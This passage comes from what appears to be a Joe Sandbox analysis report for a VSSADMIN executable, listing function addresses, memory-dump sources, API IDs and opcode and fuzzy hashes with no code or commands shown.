                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1010374628-0
                                                                                                                                                                      • Opcode ID: cea5f1581e6f6f7252908686e38380e83d2f5f1cef5c30cfc758325be99675c1
                                                                                                                                                                      • Instruction ID: 420733add9f81a24c4c7362934ee33e662b914bcb7ada205944b20f7ec50753d
                                                                                                                                                                      • Opcode Fuzzy Hash: cea5f1581e6f6f7252908686e38380e83d2f5f1cef5c30cfc758325be99675c1
                                                                                                                                                                      • Instruction Fuzzy Hash: 0E029F22E1DE4750FA65AB2194E12BA26B0AF47FB4F04463BDE5DC77D2DE3DA401A310
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8CC34 Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: gfffffff
                                                                                                                                                                      • API String ID: 0-1523873471
                                                                                                                                                                      • Opcode ID: 24567b7b7ad9cc25883cfe86a0af8cdb31fb8148e1153fa934f37376d4be2ae6
                                                                                                                                                                      • Instruction ID: cc67d198c2d019ae819fa75e9a0d604df5d18694da4de55056d789afaacfc24f
                                                                                                                                                                      • Opcode Fuzzy Hash: 24567b7b7ad9cc25883cfe86a0af8cdb31fb8148e1153fa934f37376d4be2ae6
                                                                                                                                                                      • Instruction Fuzzy Hash: A7A14872A18BC686EB21CB29A0807A97BA0EB56FA4F058133DE4D87785DE3DD501E701
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C86FC8 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: TMP
                                                                                                                                                                      • API String ID: 3215553584-3125297090
                                                                                                                                                                      • Opcode ID: 24f8c0f4820d0cfba61cbc4c59964b8a243fb78d0a30f9d39ddbc7d824280f77
                                                                                                                                                                      • Instruction ID: e36f33de6ccb18332c4cf5a1c28307fef9e220e523d97ac17a544ce488da96de
                                                                                                                                                                      • Opcode Fuzzy Hash: 24f8c0f4820d0cfba61cbc4c59964b8a243fb78d0a30f9d39ddbc7d824280f77
                                                                                                                                                                      • Instruction Fuzzy Hash: B851A415B0AE4351FA64AB669D911BA52B1AF87FE4F484036DE0DC77D2FF3CE4626200
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C925D0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HeapProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 54951025-0
                                                                                                                                                                      • Opcode ID: 2f1302fce1481fbe20b13d751b936209868e95a9271a4e16dc4ced5aa84efd4b
                                                                                                                                                                      • Instruction ID: 1304ed505d3ac40cb92c2ea740793f375db9ac42a5a96d750c97573ee6a44768
                                                                                                                                                                      • Opcode Fuzzy Hash: 2f1302fce1481fbe20b13d751b936209868e95a9271a4e16dc4ced5aa84efd4b
                                                                                                                                                                      • Instruction Fuzzy Hash: FFB09224E07E82D2EE0C2B29ACC222423B47F59B60F98407AC00C82320DF2D28AA5702
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C82830 Relevance: .3, Instructions: 327COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 740f364038b0a02b74aefc6a4002d605bb8d66e8ece03474d19f7dcd3f76f926
                                                                                                                                                                      • Instruction ID: 0f4e8741d02055cd5afaac3a5839fe6a8874107b4f85a66c1c88f48d296ca1c2
                                                                                                                                                                      • Opcode Fuzzy Hash: 740f364038b0a02b74aefc6a4002d605bb8d66e8ece03474d19f7dcd3f76f926
                                                                                                                                                                      • Instruction Fuzzy Hash: 72D1B526A08E4785EB688F25958827D27B2FF46F68F144237CE4E876D5DF39E841E340
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C780D0 Relevance: .3, Instructions: 287COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 41c2dd31deb4208f6a64af358637e949a31ffee90b73308347fda93b72d461a0
                                                                                                                                                                      • Instruction ID: 13bd95297ab99150844daf9cb97ae099c32f4b89eedb88ebeaf775024fa9b9af
                                                                                                                                                                      • Opcode Fuzzy Hash: 41c2dd31deb4208f6a64af358637e949a31ffee90b73308347fda93b72d461a0
                                                                                                                                                                      • Instruction Fuzzy Hash: 1FC194722181E04BE2C9EB29E46947E77A1F78D35EB94403BEB8747B89C73CA414D750
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C81EA0 Relevance: .2, Instructions: 241COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 081855a1139a905c050f004adae9c343e6fe2e6a907cc23c5706cce6c129a0ff
                                                                                                                                                                      • Instruction ID: e7664f2e91afe78b94e59d50b6f3941c016497969a7230d0dc6ac89b7b1ae7b4
                                                                                                                                                                      • Opcode Fuzzy Hash: 081855a1139a905c050f004adae9c343e6fe2e6a907cc23c5706cce6c129a0ff
                                                                                                                                                                      • Instruction Fuzzy Hash: DFB16E76908B8689E7658F29C09827D3BB1E746F68F244137CB4E87399DF39D841E704
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8D748 Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: c73884664ec6463b3ef8ba4e0c781f3417535d3b4587aef21b1cb5b9e685f8d4
                                                                                                                                                                      • Instruction ID: e5102d0faebc3bc024e51d42d93fede6ab7f50ddb2273e8fa36000efae304bf0
                                                                                                                                                                      • Opcode Fuzzy Hash: c73884664ec6463b3ef8ba4e0c781f3417535d3b4587aef21b1cb5b9e685f8d4
                                                                                                                                                                      • Instruction Fuzzy Hash: B181A572A0CB8286E774CF15D48037A76B1FB86BA4F544236DA9D87B99DF3CE4419B00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C95850 Relevance: .2, Instructions: 183COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 3bf38bb552e652050a5a4325e5c4404943d37f9760ac8566a9e89c8f0e7421a3
                                                                                                                                                                      • Instruction ID: 472c95f83ef0b351014b0551faa3d00f70c272e58f54976015a960076bb4bbb1
                                                                                                                                                                      • Opcode Fuzzy Hash: 3bf38bb552e652050a5a4325e5c4404943d37f9760ac8566a9e89c8f0e7421a3
                                                                                                                                                                      • Instruction Fuzzy Hash: 4A610923F1CA9256FB248928C4D037D66A1AF62F78F55023BD61EC76C5EE7EE8018704
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C80FE4 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: d861661aa08db629cc23cdca8c369b076586a2e450c00db1ba5d57a294e44a4f
                                                                                                                                                                      • Instruction ID: 006979ef8885678ae3eef1199d945128724ca4340e782aa1e553f738d6b27d00
                                                                                                                                                                      • Opcode Fuzzy Hash: d861661aa08db629cc23cdca8c369b076586a2e450c00db1ba5d57a294e44a4f
                                                                                                                                                                      • Instruction Fuzzy Hash: 75516476A18A6286E7248B29D48023937F1EB96F78F244132CE4D97795DF3AEC42D740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C80BD4 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: c32b4ddfd43473a216dec7aa9a0be5b617892f75f4149cffacdc7470c95e978f
                                                                                                                                                                      • Instruction ID: 6f69ce8e5e518fdabb0ae9fcf85759bff3e855f8ebd377b197db6f3e1b7da469
                                                                                                                                                                      • Opcode Fuzzy Hash: c32b4ddfd43473a216dec7aa9a0be5b617892f75f4149cffacdc7470c95e978f
                                                                                                                                                                      • Instruction Fuzzy Hash: 5F5154B6A19E5285E7648F2AC08022927B0FB56F78F254136CA4D97795CF3AE842D740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C813F4 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 867914ff4df0b6b44d704adc42bbe88cde9096fdc707783f05752eff833c7ffe
                                                                                                                                                                      • Instruction ID: 0da443adf3587d0a84184b18e4223e1d7fd88d47c2425ab743bc025dd0cc97f4
                                                                                                                                                                      • Opcode Fuzzy Hash: 867914ff4df0b6b44d704adc42bbe88cde9096fdc707783f05752eff833c7ffe
                                                                                                                                                                      • Instruction Fuzzy Hash: EE515376A18E5286E7648F29D08067837F0EBC6F78F244132CA8D97795CF3AE842D740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C80DE0 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 1de1d42fcd570761cca71ddda72003ed022ec41b6526507f8e47f89f031e3167
                                                                                                                                                                      • Instruction ID: 65dfede50d0236d1fd5917b023b6cc7c97def60cef4c7910d9a96aa26d427adf
                                                                                                                                                                      • Opcode Fuzzy Hash: 1de1d42fcd570761cca71ddda72003ed022ec41b6526507f8e47f89f031e3167
                                                                                                                                                                      • Instruction Fuzzy Hash: 36518976618E5385E7648B2AC08123937B1EB46F68F258132DE8D97795CF3AE843D740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C809D0 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 876697f8e8f5cbbdb44752562e3cb115d809b93d1bac5633a342ac63b65505f1
                                                                                                                                                                      • Instruction ID: 00c0e0fac35cc771bf91b97dddb3b5ff330c7026de94d2c949eca88e32ff270c
                                                                                                                                                                      • Opcode Fuzzy Hash: 876697f8e8f5cbbdb44752562e3cb115d809b93d1bac5633a342ac63b65505f1
                                                                                                                                                                      • Instruction Fuzzy Hash: 47518A76618E5385E7248B2AC08027937F1EB46F68F264132CE4D97795DF3AEC42D740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C811F0 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 6b4a4146db3bd1fe649265067838c8b0d7c1a5e97031d62dd0eb31e0fdd0228e
                                                                                                                                                                      • Instruction ID: 49aaa156dee3816050b8f5a721433f87be13c22edf557c23a04eab302e77b883
                                                                                                                                                                      • Opcode Fuzzy Hash: 6b4a4146db3bd1fe649265067838c8b0d7c1a5e97031d62dd0eb31e0fdd0228e
                                                                                                                                                                      • Instruction Fuzzy Hash: 19515676A18E5285E7648B29D08067C27F1EBC6F68F244132CE8D97799CF3AEC52D740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C84F80 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                      • Instruction ID: 6cad8842eea803e00bc55e1cf9e6972c086e51a375b4682bd97cd92081eb7596
                                                                                                                                                                      • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                      • Instruction Fuzzy Hash: F2410A62C99E4B04E9518D1809807B86BA09F33FF8D5862B6DD9AD37CFEE4C2586F101
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C88BD0 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
